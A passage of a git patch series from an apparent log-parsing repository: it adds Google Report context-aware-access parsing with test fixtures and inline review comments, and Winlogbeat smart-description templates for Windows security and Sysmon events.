"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": 
"LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file From 8bcde47c77e71b93d99f114695639467987b3d16 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 16:42:34 +0100 Subject: [PATCH 038/150] Add context access service --- Google Cloud/google-report/_meta/fields.yml | 5 ++ .../_meta/smart-descriptions.json | 18 ++++++ Google Cloud/google-report/ingest/parser.yml | 10 ++++ .../tests/test_access_sample_1.json | 58 +++++++++++++++++++ 4 files changed, 91 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_access_sample_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..4fc31cc4b 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -1,3 +1,8 @@ +google.report.access.application: + description: Application name + name: google.report.access.application + type: keyword + google.report.actor.email: description: '' name: google.report.actor.email diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..51fcc1837 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
@@ -168,6 +168,24 @@
 }
 ]
 },
+ {
+ "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}",
+ "conditions": [
+ {
+ "field": "network.application",
+ "value": "context_aware_access"
+ },
+ {
+ "field": "user.email"
+ },
+ {
+ "field": "event.action"
+ },
+ {
+ "field": "google.report.access.application"
+ }
+ ]
+ },
 {
 "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
 "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index bd5fd0d4e..25f2888b2 100644
--- a/Google Cloud/google-report/ingest/parser.yml
+++ b/Google Cloud/google-report/ingest/parser.yml
@@ -1,4 +1,5 @@
 name: google-report
+ignored_values: ["UNKNOWN"]
 pipeline:
 - name: json_event
 external:
@@ -28,6 +29,8 @@ pipeline:
 filter: '{{ json_event.message.id.applicationName == "admin"}}'
 - name: set_vault_fields
 filter: '{{ json_event.message.id.applicationName == "vault"}}'
+ - name: set_context_aware_fields
+ filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}'
 - name: set_parameters_fields
 filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
 
@@ -258,3 +261,10 @@ stages:
 {%- endif -%}
 {% endfor %}
 {{ types|unique|list }}
+
+ set_context_aware_fields:
+ actions:
+ - set:
+ event.type: ["denied"]
+ device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'
+ google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}'
diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json
new file mode 100644
index 000000000..e83076db1
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_access_sample_1.json
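Review bot: The new description's `value` starts with a leading space (`" Access to ...`), which is rendered verbatim, and none of the neighbouring entries begin with whitespace. Change it to `"value": "Access to {google.report.access.application} was denied for {user.email}: {event.action}",`. The text also hard-codes "was denied" while the only condition on the event is `network.application` equal to `context_aware_access`, with no condition on `event.action`; if that application can report anything other than deny events the sentence will be wrong for them, so either add an `event.action` condition or word it neutrally.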
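Review bot: `ignored_values: ["UNKNOWN"]` in the first parser.yml hunk is a file-level option, so the literal `UNKNOWN` is now suppressed from every field of every Google Report application, not only from the `CAA_DEVICE_ID` case the new test exercises; a legitimately `UNKNOWN` value in any other application's field would silently disappear. Scoping it to the field that needs it in the third hunk, `device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" and param.value != "UNKNOWN" %}{{param.value}}{% endif %}{% endfor %}'`, gives the same test output (assuming the parser drops empty results, which the sibling `set` actions already rely on) without the global side effect. In that third hunk `event.type: ["denied"]` is also set for every `context_aware_access` event regardless of `events[0].name`; if the application ever emits a non-deny event this mislabels it, so a `filter:` on the event name, as the other stages use, would be safer. The `stages:` mapping enclosing `set_context_aware_fields` starts before the hunk.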
@@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is 
admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file From 4f2e1bfea597d812bf2dcb478bebdc59684e770d Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 16:57:21 +0100 Subject: [PATCH 039/150] Updated smart descriptions --- .../winlogbeat/_meta/smart-descriptions.json | 1129 +++++++++++++++++ 1 file changed, 1129 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index eb6a595a2..5eaf6dc64 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json 
@@ -1,4 +1,1133 @@ [ + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + 
} + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": 
"Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": 
"executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + 
"value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + 
"type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + 
"field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", 
+ "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + 
"value": 4798 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} 
from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": 
"action.id", + "value": 4103 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4106 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Process {process.executable} changed the 
creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + 